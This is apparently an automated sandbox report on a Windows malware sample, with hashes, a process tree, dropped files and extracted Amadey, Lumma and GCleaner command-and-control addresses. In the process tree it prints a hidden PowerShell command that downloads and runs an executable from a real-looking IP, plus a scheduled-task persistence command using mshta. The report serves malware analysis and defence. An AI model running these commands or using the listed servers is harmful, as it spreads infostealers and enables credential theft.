Analysis

  • max time kernel
    143s
  • max time network
    137s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250314-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system
  • submitted
    04/04/2025, 08:52

General

  • Target

    random.exe

  • Size

    5.4MB

  • MD5

    287364d198a535e3fd3643d55e38055c

  • SHA1

    4c252add7ca1d05b4c204e5f43c5c1c52bbb9194

  • SHA256

    e682c8222f3a68109482061e9591a307512e2cf9c1149ce771eb2f89898b3a6c

  • SHA512

    91e9e98aa1269d692b0601402d5bbfcc6d47533a7a9fd7e334fcbeecca54b36d0ac6f45df7717fb865527b165d2eb45572263395977ca84f83c4417b3599849b

  • SSDEEP

    98304:MGK6dLZWrN5EXrwW+Hytgc7yGuSKvy659q2c0cJ6ChSoNRzqB0ARkP9Xk:lxZWrXEXr5+StgcGGuLvy6f00cRNwuA

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Family

amadey

Version

5.21

Botnet

092155

C2

http://176.113.115.6

Attributes
  • install_dir

    bb556cff4a

  • install_file

    rapes.exe

  • strings_key

    a131b127e996a898cd19ffb2d92e481b

  • url_paths

    /Ni9kiput/index.php

rc4.plain

Extracted

Family

lumma

C2

https://pirtyoffensiz.bet/api

https://luncertainyelemz.bet/api

https://hobbyedsmoker.live/api

https://dsfljsdfjewf.info/api

https://gdeaddereaste.today/api

https://subawhipnator.life/api

https://fprivileggoe.live/api

https://decreaserid.world/api

https://pastedeputten.life/api

https://rodformi.run/aUosoz

https://metalsyo.digital/opsa

https://ironloxp.live/aksdd

https://navstarx.shop/FoaJSi

https://wstarcloc.bet/GOksAo

https://advennture.top/GKsiio

https://atargett.top/dsANGt

https://spacedbv.world/EKdlsk

https://galxnetb.today/GsuIAo

Extracted

Family

gcleaner

C2

185.156.73.98

45.91.200.135

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Amadey family
  • GCleaner

    GCleaner is a Pay-Per-Install malware loader first discovered in early 2019.

  • Gcleaner family
  • Lumma Stealer, LummaC

    Lumma or LummaC is an infostealer written in C++ first seen in August 2022.

  • Lumma family
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 8 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell and hide display window.

  • Downloads MZ/PE file 6 IoCs
  • Checks BIOS information in registry 2 TTPs 16 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 3 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 17 IoCs
  • Identifies Wine through registry keys 2 TTPs 8 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Adds Run key to start application 2 TTPs 2 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • AutoIT Executable 1 IoCs

    AutoIT scripts compiled to PE executables.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 8 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 17 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 27 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of FindShellTrayWindow 3 IoCs
  • Suspicious use of SendNotifyMessage 3 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\random.exe
    "C:\Users\Admin\AppData\Local\Temp\random.exe"
    1⤵
    • Adds Run key to start application
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:4636
    • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\L6I13.exe
      C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\L6I13.exe
      2⤵
      • Executes dropped EXE
      • Adds Run key to start application
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:4796
      • C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1U31H7.exe
        C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1U31H7.exe
        3⤵
        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
        • Checks BIOS information in registry
        • Checks computer location settings
        • Executes dropped EXE
        • Identifies Wine through registry keys
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • Drops file in Windows directory
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of WriteProcessMemory
        PID:3360
        • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
          "C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
          4⤵
          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
          • Downloads MZ/PE file
          • Checks BIOS information in registry
          • Checks computer location settings
          • Executes dropped EXE
          • Identifies Wine through registry keys
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of WriteProcessMemory
          PID:4092
          • C:\Users\Admin\AppData\Local\Temp\10444620101\113222d33b.exe
            "C:\Users\Admin\AppData\Local\Temp\10444620101\113222d33b.exe"
            5⤵
            • Executes dropped EXE
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            PID:4232
          • C:\Users\Admin\AppData\Local\Temp\10444630101\V8LkpDo.exe
            "C:\Users\Admin\AppData\Local\Temp\10444630101\V8LkpDo.exe"
            5⤵
            • Executes dropped EXE
            PID:448
          • C:\Users\Admin\AppData\Local\Temp\10444640101\V8LkpDo.exe
            "C:\Users\Admin\AppData\Local\Temp\10444640101\V8LkpDo.exe"
            5⤵
            • Executes dropped EXE
            PID:4104
          • C:\Users\Admin\AppData\Local\Temp\10444650101\2da9f8d79e.exe
            "C:\Users\Admin\AppData\Local\Temp\10444650101\2da9f8d79e.exe"
            5⤵
            • Executes dropped EXE
            PID:968
          • C:\Users\Admin\AppData\Local\Temp\10444660101\735faf761a.exe
            "C:\Users\Admin\AppData\Local\Temp\10444660101\735faf761a.exe"
            5⤵
            • Executes dropped EXE
            • System Location Discovery: System Language Discovery
            • Suspicious use of FindShellTrayWindow
            • Suspicious use of SendNotifyMessage
            • Suspicious use of WriteProcessMemory
            PID:1556
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /c schtasks /create /tn c0z42ma1TuQ /tr "mshta C:\Users\Admin\AppData\Local\Temp\vDfFxJpGk.hta" /sc minute /mo 25 /ru "Admin" /f
              6⤵
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:1508
              • C:\Windows\SysWOW64\schtasks.exe
                schtasks /create /tn c0z42ma1TuQ /tr "mshta C:\Users\Admin\AppData\Local\Temp\vDfFxJpGk.hta" /sc minute /mo 25 /ru "Admin" /f
                7⤵
                • System Location Discovery: System Language Discovery
                • Scheduled Task/Job: Scheduled Task
                PID:2172
            • C:\Windows\SysWOW64\mshta.exe
              mshta C:\Users\Admin\AppData\Local\Temp\vDfFxJpGk.hta
              6⤵
              • Checks computer location settings
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:4864
              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'2WTJ2JWIZUN6FPHI0NHCCXSTNBEVBTDN.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
                7⤵
                • Blocklisted process makes network request
                • Command and Scripting Interpreter: PowerShell
                • Downloads MZ/PE file
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of WriteProcessMemory
                PID:4676
                • C:\Users\Admin\AppData\Local\Temp2WTJ2JWIZUN6FPHI0NHCCXSTNBEVBTDN.EXE
                  "C:\Users\Admin\AppData\Local\Temp2WTJ2JWIZUN6FPHI0NHCCXSTNBEVBTDN.EXE"
                  8⤵
                  • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                  • Checks BIOS information in registry
                  • Executes dropped EXE
                  • Identifies Wine through registry keys
                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  PID:1576
          • C:\Users\Admin\AppData\Local\Temp\10444670101\90838c1b51.exe
            "C:\Users\Admin\AppData\Local\Temp\10444670101\90838c1b51.exe"
            5⤵
            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
            • Checks BIOS information in registry
            • Executes dropped EXE
            • Identifies Wine through registry keys
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            PID:2020
          • C:\Users\Admin\AppData\Local\Temp\10444680101\9fc8ad210e.exe
            "C:\Users\Admin\AppData\Local\Temp\10444680101\9fc8ad210e.exe"
            5⤵
            • Executes dropped EXE
            • Suspicious use of SetThreadContext
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:2284
            • C:\Users\Admin\AppData\Local\Temp\svchost015.exe
              "C:\Users\Admin\AppData\Local\Temp\10444680101\9fc8ad210e.exe"
              6⤵
              • Downloads MZ/PE file
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              PID:2088
          • C:\Users\Admin\AppData\Local\Temp\10444690101\28a45e52b0.exe
            "C:\Users\Admin\AppData\Local\Temp\10444690101\28a45e52b0.exe"
            5⤵
            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
            • Checks BIOS information in registry
            • Executes dropped EXE
            • Identifies Wine through registry keys
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • Suspicious use of SetThreadContext
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of WriteProcessMemory
            PID:1564
            • C:\Users\Admin\AppData\Local\Temp\svchost015.exe
              "C:\Users\Admin\AppData\Local\Temp\10444690101\28a45e52b0.exe"
              6⤵
              • Downloads MZ/PE file
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              PID:2232
      • C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2p7021.exe
        C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2p7021.exe
        3⤵
        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
        • Checks BIOS information in registry
        • Executes dropped EXE
        • Identifies Wine through registry keys
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        PID:4176
  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:220
    • C:\Windows\system32\rundll32.exe
      rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\"
      2⤵
        PID:4928
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\"
      1⤵
      • Suspicious use of WriteProcessMemory
      PID:4752
      • C:\Windows\system32\rundll32.exe
        rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\"
        2⤵
          PID:1876
      • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
        C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
        1⤵
        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
        • Checks BIOS information in registry
        • Executes dropped EXE
        • Identifies Wine through registry keys
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • Suspicious behavior: EnumeratesProcesses
        PID:976
      • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
        C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
        1⤵
        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
        • Checks BIOS information in registry
        • Executes dropped EXE
        • Identifies Wine through registry keys
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • Suspicious behavior: EnumeratesProcesses
        PID:3968

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\54M48DI2\service[1].htm

        Filesize

        1B

        MD5

        cfcd208495d565ef66e7dff9f98764da

        SHA1

        b6589fc6ab0dc82cf12099d1c2d40ab994e8410c

        SHA256

        5feceb66ffc86f38d952786c6d696c79c2dbc239dd4e91b46729d73a27fb57e9

        SHA512

        31bca02094eb78126a517b206a88c73cfa9ec6f704c7030d18212cace820f025f00bf0ea68dbf3f3a5436ca63b53bf7bf80ad8d5de7d8359d0b7fed9dbc3ab99

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\B59V21Q5\soft[1]

        Filesize

        3.0MB

        MD5

        91f372706c6f741476ee0dac49693596

        SHA1

        8e8973d35d3de0ade6cc8e44cd21f2cffbdfe83d

        SHA256

        9a401dded25b4bafd24225449ed48468787290bbb308dc5e40511da2858bb781

        SHA512

        88b26c1c49bc2a77dbdcea0e22c33555932498b3a4cff66f6b08438c0d96a017367c14508249aa1ca2090ed0ca6081e28757fbda97f856675d9db9cc61f7b7ed

      • C:\Users\Admin\AppData\Local\Temp2WTJ2JWIZUN6FPHI0NHCCXSTNBEVBTDN.EXE

        Filesize

        1.8MB

        MD5

        a616c70b521871a888c297266c93e4dc

        SHA1

        9c155bfcc1f54ad43feea0a5c03fc9d1b6529b7a

        SHA256

        788c57b940278eb945aec7589626e9282741922a6bf31769ab5beb4427a83eff

        SHA512

        9be0945d78d314e96e3b0d62ebe448e14650a9620bc9ba70df9c4d359f1302abcf28a1d553515bbfbc9f147041161a75b99742765cf7776f19a69ecd6989b662

      • C:\Users\Admin\AppData\Local\Temp\10444620101\113222d33b.exe

        Filesize

        716KB

        MD5

        57a5e092cf652a8d2579752b0b683f9a

        SHA1

        6aad447f87ab12c73411dec5f34149034c3027fc

        SHA256

        29054ff2ce08e589dcc28d1e831f0c99659148f1faaabc81913207c4d12b4a34

        SHA512

        5759fc4bf73a54899fb060df243cdd1c1629504b20695d7116317a1941ef1f86449c9c3388d5a48bc7e4223207c985eadba1950e15c045d15890423701ba1b1f

      • C:\Users\Admin\AppData\Local\Temp\10444620101\113222d33b.exe

        Filesize

        358KB

        MD5

        e604fe68e20a0540ee70bb4bd2d897d0

        SHA1

        00a4d755d8028dbe2867789898b1736f0b17b31c

        SHA256

        6262dac7e6839a9300b48f50d6d87011fc3e9baae5bbcec14ba00b7a6da6f361

        SHA512

        996216993cc5e07e73d6b3c6485263537377c6b5af94a8b681216e7c5f8383672408998d4186a73f5fe83d94f48bf0a54d6a7c2ca82d3aa825ade2462db0bd89

      • C:\Users\Admin\AppData\Local\Temp\10444630101\V8LkpDo.exe

        Filesize

        8.0MB

        MD5

        7b53eb00bf22b994fa8b48428e370c22

        SHA1

        35bf0858a1dd9953aff51838f71e3211c0cf39b3

        SHA256

        e47b6840a986f6ace12c353048ec996b3669987687f77c8b7dd9adf53575601b

        SHA512

        841d0504f055a5b93a9a690b09e9b0d05ad09b57ee30c620b81677fc26fd09eeb8a6396a5e1c198efb8b6eefd63ece7430f980bcbcd3bdd8c531912d1283d33f

      • C:\Users\Admin\AppData\Local\Temp\10444650101\2da9f8d79e.exe

        Filesize

        1.4MB

        MD5

        f3f9535109155498021e63c23197285f

        SHA1

        cf2198f27d4d8d4857a668fa174d4753e2aa1dca

        SHA256

        1ec54b5a3d71165f456a6e441bd7d6d85500973f953b9d6388c1c24a35cc449f

        SHA512

        a05607b2d128055117877682f05b5abf1777addcb79debdac812cbc78cbef56ca87abca463b6fa96679172f580fd1603e7e470b7484248a3cdde0c0bc3124755

      • C:\Users\Admin\AppData\Local\Temp\10444650101\2da9f8d79e.exe

        Filesize

        730KB

        MD5

        31aeed8d880e1c68a97f0d8739a5df8a

        SHA1

        d6f140d63956bc260639ab3c80f12a0e9b010ee9

        SHA256

        bc7e489815352f360b6f0c0064e1d305db9150976c4861b19b614be0a5115f97

        SHA512

        bacbe9af92bf8f2adb7997d6db2f8a8fe833dbcef5af0cc465f6e41c2f409019b740c82f4b587d60ce1446f9cf10ebcb638bdf8d5fe05c7e8e8c518b747b6748

      • C:\Users\Admin\AppData\Local\Temp\10444660101\735faf761a.exe

        Filesize

        938KB

        MD5

        a798a2631ae2bc2f61b80ce937c75c65

        SHA1

        f718fd2971eb1c17f0c1b7940c00e2e8ff18bcc2

        SHA256

        3d3acb05b2a067b5bd9f7561320c2a61a23344c8f3cb78ac429b4e22b9f955b6

        SHA512

        2d55ef28fe438b20f1a7122ecd8002ce4e7e57006eebec290693b4be923c11ea82b58c90b9028cb103af4e2f15617e1b6a3dca7d6abce501f96121d7eb920daf

      • C:\Users\Admin\AppData\Local\Temp\10444670101\90838c1b51.exe

        Filesize

        1.8MB

        MD5

        15c8b2c9850ae1e61fefc93fa7d68420

        SHA1

        c5ae1454178293c4b26934572a8189bc5bb19798

        SHA256

        835795ba6a18c56ddc56f0fad120d0a6f4ce47a55f8b9f29c59692e3965285f0

        SHA512

        faaaf9dd1a9bdf77e76c6faa3d305d071289e280922b37ec6742c21642a05edf15cfb57663319e425755a62793446944b6b16c5eb1328c1567d5bad4fa0579e4

      • C:\Users\Admin\AppData\Local\Temp\10444680101\9fc8ad210e.exe

        Filesize

        5.9MB

        MD5

        e05432c13d42b8526ce4bc0dc240d297

        SHA1

        db6e9382425055030662ecdc95d6405d30dcf82a

        SHA256

        574c5ba90e69460799a53ea6fc88d8c6ba4b2b749f739f61779e1975e53e15d9

        SHA512

        56ad65cc3608f67b680599f8769a0bb0a8b16bdaaf62569c517fa54e72c12671d57472c1e88baaa13cf69a95b84887c527cba666abbca61a923d380dd71481ee

      • C:\Users\Admin\AppData\Local\Temp\10444690101\28a45e52b0.exe

        Filesize

        4.3MB

        MD5

        1fb7beea8967c3ce15e72e9a8d14dc28

        SHA1

        e2354deb9e8e84f7915bbad85fc934df8330557c

        SHA256

        56208f729c6b9895dd87a0f120972a8b48320b247b4f668f6ef9f483044d3e48

        SHA512

        6ba0db71de31f8ce3ee1cf84581015ac3bfc7fd898121214f92ba14b0f2b3bf75e11e9941c6d83f71364399af6be6159f141e78bde6b4f42036020842ff32381

      • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3n03B.exe

        Filesize

        1.7MB

        MD5

        1e95dc10fef7079a5d3fa793732a7cce

        SHA1

        8e9ccb511e76c921c6ddf2a2615a2e3c86ea4113

        SHA256

        81ac77037e15e56a6cdc0ba7e2af38e3e5a9f7a353054276c763e57d03db5ec1

        SHA512

        c35cb0cc0cc9046acab79fc70e26c28fa32f86e79dc36d44f938efada6bd45b190746d6f966552aa3eba45967b7f3ba7e113d8593576b7bb7f7fcaf670a23773

      • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\L6I13.exe

        Filesize

        3.5MB

        MD5

        f57495f53acd120aecedd85d16ba34ab

        SHA1

        64b0576fa1e754318fa8ee9c3bd04307af707bda

        SHA256

        8d7d52c04fbd9fb28348d8b0346b1331ae5f93f1c3063a67c89a5c4ee1330eba

        SHA512

        24a922d508ee2f66cfb9c7706376e1636494e6a7a45d1328b7e11c229151dfe9bc1333e6ab9a706bac7aa57f8a67405b11ac08d49f8441c308d4596f31d0ede1

      • C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1U31H7.exe

        Filesize

        1.8MB

        MD5

        93da4bdbae52d91d32a34c140466e8cf

        SHA1

        2177f234160ef77058d2237a8f97c1d663647240

        SHA256

        878228e580cd27a72a847922f9b16b7d16d0797c68aa9e6642ae3da13518de7a

        SHA512

        14d14d6d8d436953ed43483b8b3ba30a4f1df73eb2eca055c047bb0b7e328150ae0c49122a657f5f8ab752872e5d40b791e793675110df5c90440077f446b91a

      • C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2p7021.exe

        Filesize

        3.0MB

        MD5

        5e79df97975b488e901487db545d5de8

        SHA1

        2cc617e5bd4cf348b8a1fccf2716686cf2c63fe6

        SHA256

        aa38c813aafc36532f6d8e826f2f7665b26c2c0ef2ff7395c21230f2640cb966

        SHA512

        5bbfee010c11ba03ef2db2a7a0280aae19f94aced5b2bb2085d5ea97a5d321d89368912cf8d563cbeb7de0f755ef5990adf9199b5f172d115bdc6e6e4442571f

      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_bpgnxic0.ag2.ps1

        Filesize

        60B

        MD5

        d17fe0a3f47be24a6453e9ef58c94641

        SHA1

        6ab83620379fc69f80c0242105ddffd7d98d5d9d

        SHA256

        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

        SHA512

        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

      • C:\Users\Admin\AppData\Local\Temp\svchost015.exe

        Filesize

        2.9MB

        MD5

        b826dd92d78ea2526e465a34324ebeea

        SHA1

        bf8a0093acfd2eb93c102e1a5745fb080575372e

        SHA256

        7824b50acdd144764dac7445a4067b35cf0fef619e451045ab6c1f54f5653a5b

        SHA512

        1ac4b731b9b31cabf3b1c43aee37206aee5326c8e786abe2ab38e031633b778f97f2d6545cf745c3066f3bd47b7aaf2ded2f9955475428100eaf271dd9aeef17

      • C:\Users\Admin\AppData\Local\Temp\vDfFxJpGk.hta

        Filesize

        717B

        MD5

        5edc9176d596bafa3fdbd9ba6833f458

        SHA1

        3241c5420023da045db15467a6818cb7d55fa8df

        SHA256

        87eb795ca39291753ccfee5e294d793f2fd95dcd5b391a17c6bbffb13186669c

        SHA512

        e1e9be179451598e9194d6d956f8fa1749f2008bade470b95e8f874305e3a23c1d359076f9d5739c9475ac7f22bf9a47ea421b55b1040609d4ac71a7aaabcd75

      • C:\Users\Admin\Desktop\YCL.lnk

        Filesize

        2KB

        MD5

        bcf080c051a4a3105219f1e462fdaead

        SHA1

        37069bb6e423bb038780367a463e0a29e11d0b27

        SHA256

        2da3eac1eec45209c5dfeab93135372dd476b1960e598ee9067fc56843e8820c

        SHA512

        5e8f50a7a04ba543999b3555f49c36619fde98179bf1bbd9aa40d44c939e913dd241b0ba446410f3488f810c76f62e18faaa1f0f714d342d732b94db082a11af

      • memory/976-169-0x0000000000EA0000-0x0000000001362000-memory.dmp

        Filesize

        4.8MB

      • memory/976-168-0x0000000000EA0000-0x0000000001362000-memory.dmp

        Filesize

        4.8MB

      • memory/1564-212-0x0000000000400000-0x0000000000CD2000-memory.dmp

        Filesize

        8.8MB

      • memory/1564-221-0x0000000000400000-0x0000000000CD2000-memory.dmp

        Filesize

        8.8MB

      • memory/1576-150-0x0000000000190000-0x0000000000648000-memory.dmp

        Filesize

        4.7MB

      • memory/1576-146-0x0000000000190000-0x0000000000648000-memory.dmp

        Filesize

        4.7MB

      • memory/2020-166-0x00000000008C0000-0x0000000000D75000-memory.dmp

        Filesize

        4.7MB

      • memory/2020-164-0x00000000008C0000-0x0000000000D75000-memory.dmp

        Filesize

        4.7MB

      • memory/2088-225-0x0000000010000000-0x000000001001C000-memory.dmp

        Filesize

        112KB

      • memory/2088-269-0x0000000000400000-0x000000000042E000-memory.dmp

        Filesize

        184KB

      • memory/2088-191-0x0000000000400000-0x000000000042E000-memory.dmp

        Filesize

        184KB

      • memory/2088-193-0x0000000000400000-0x000000000042E000-memory.dmp

        Filesize

        184KB

      • memory/2088-214-0x0000000000400000-0x000000000042E000-memory.dmp

        Filesize

        184KB

      • memory/2088-187-0x0000000000400000-0x000000000042E000-memory.dmp

        Filesize

        184KB

      • memory/2088-277-0x0000000000400000-0x000000000042E000-memory.dmp

        Filesize

        184KB

      • memory/2088-231-0x0000000000400000-0x000000000042E000-memory.dmp

        Filesize

        184KB

      • memory/2232-220-0x0000000000400000-0x000000000042E000-memory.dmp

        Filesize

        184KB

      • memory/2232-251-0x0000000000400000-0x000000000042E000-memory.dmp

        Filesize

        184KB

      • memory/2232-233-0x0000000000400000-0x000000000042E000-memory.dmp

        Filesize

        184KB

      • memory/2232-217-0x0000000000400000-0x000000000042E000-memory.dmp

        Filesize

        184KB

      • memory/2232-215-0x0000000000400000-0x000000000042E000-memory.dmp

        Filesize

        184KB

      • memory/2232-290-0x0000000000400000-0x000000000042E000-memory.dmp

        Filesize

        184KB

      • memory/2232-289-0x0000000000500000-0x0000000000681000-memory.dmp

        Filesize

        1.5MB

      • memory/2284-190-0x0000000000400000-0x00000000009F2000-memory.dmp

        Filesize

        5.9MB

      • memory/3360-28-0x0000000000420000-0x00000000008E2000-memory.dmp

        Filesize

        4.8MB

      • memory/3360-15-0x0000000000420000-0x00000000008E2000-memory.dmp

        Filesize

        4.8MB

      • memory/3968-271-0x0000000000EA0000-0x0000000001362000-memory.dmp

        Filesize

        4.8MB

      • memory/3968-278-0x0000000000EA0000-0x0000000001362000-memory.dmp

        Filesize

        4.8MB

      • memory/4092-254-0x0000000000EA0000-0x0000000001362000-memory.dmp

        Filesize

        4.8MB

      • memory/4092-293-0x0000000000EA0000-0x0000000001362000-memory.dmp

        Filesize

        4.8MB

      • memory/4092-51-0x0000000000EA0000-0x0000000001362000-memory.dmp

        Filesize

        4.8MB

      • memory/4092-50-0x0000000000EA0000-0x0000000001362000-memory.dmp

        Filesize

        4.8MB

      • memory/4092-80-0x0000000000EA0000-0x0000000001362000-memory.dmp

        Filesize

        4.8MB

      • memory/4092-294-0x0000000000EA0000-0x0000000001362000-memory.dmp

        Filesize

        4.8MB

      • memory/4092-170-0x0000000000EA0000-0x0000000001362000-memory.dmp

        Filesize

        4.8MB

      • memory/4092-264-0x0000000000EA0000-0x0000000001362000-memory.dmp

        Filesize

        4.8MB

      • memory/4092-194-0x0000000000EA0000-0x0000000001362000-memory.dmp

        Filesize

        4.8MB

      • memory/4092-222-0x0000000000EA0000-0x0000000001362000-memory.dmp

        Filesize

        4.8MB

      • memory/4092-292-0x0000000000EA0000-0x0000000001362000-memory.dmp

        Filesize

        4.8MB

      • memory/4092-291-0x0000000000EA0000-0x0000000001362000-memory.dmp

        Filesize

        4.8MB

      • memory/4092-29-0x0000000000EA0000-0x0000000001362000-memory.dmp

        Filesize

        4.8MB

      • memory/4092-282-0x0000000000EA0000-0x0000000001362000-memory.dmp

        Filesize

        4.8MB

      • memory/4092-242-0x0000000000EA0000-0x0000000001362000-memory.dmp

        Filesize

        4.8MB

      • memory/4092-132-0x0000000000EA0000-0x0000000001362000-memory.dmp

        Filesize

        4.8MB

      • memory/4176-34-0x0000000000490000-0x000000000078B000-memory.dmp

        Filesize

        3.0MB

      • memory/4176-33-0x0000000000490000-0x000000000078B000-memory.dmp

        Filesize

        3.0MB

      • memory/4676-138-0x0000000008970000-0x0000000008F14000-memory.dmp

        Filesize

        5.6MB

      • memory/4676-130-0x0000000006400000-0x000000000641E000-memory.dmp

        Filesize

        120KB

      • memory/4676-131-0x0000000006440000-0x000000000648C000-memory.dmp

        Filesize

        304KB

      • memory/4676-119-0x0000000005D90000-0x0000000005DF6000-memory.dmp

        Filesize

        408KB

      • memory/4676-118-0x00000000056E0000-0x0000000005746000-memory.dmp

        Filesize

        408KB

      • memory/4676-134-0x0000000006950000-0x000000000696A000-memory.dmp

        Filesize

        104KB

      • memory/4676-137-0x0000000007870000-0x0000000007892000-memory.dmp

        Filesize

        136KB

      • memory/4676-136-0x00000000078E0000-0x0000000007976000-memory.dmp

        Filesize

        600KB

      • memory/4676-133-0x0000000007D40000-0x00000000083BA000-memory.dmp

        Filesize

        6.5MB

      • memory/4676-117-0x0000000005580000-0x00000000055A2000-memory.dmp

        Filesize

        136KB

      • memory/4676-129-0x0000000005E00000-0x0000000006154000-memory.dmp

        Filesize

        3.3MB

      • memory/4676-116-0x0000000005760000-0x0000000005D88000-memory.dmp

        Filesize

        6.2MB

      • memory/4676-115-0x0000000002E10000-0x0000000002E46000-memory.dmp

        Filesize

        216KB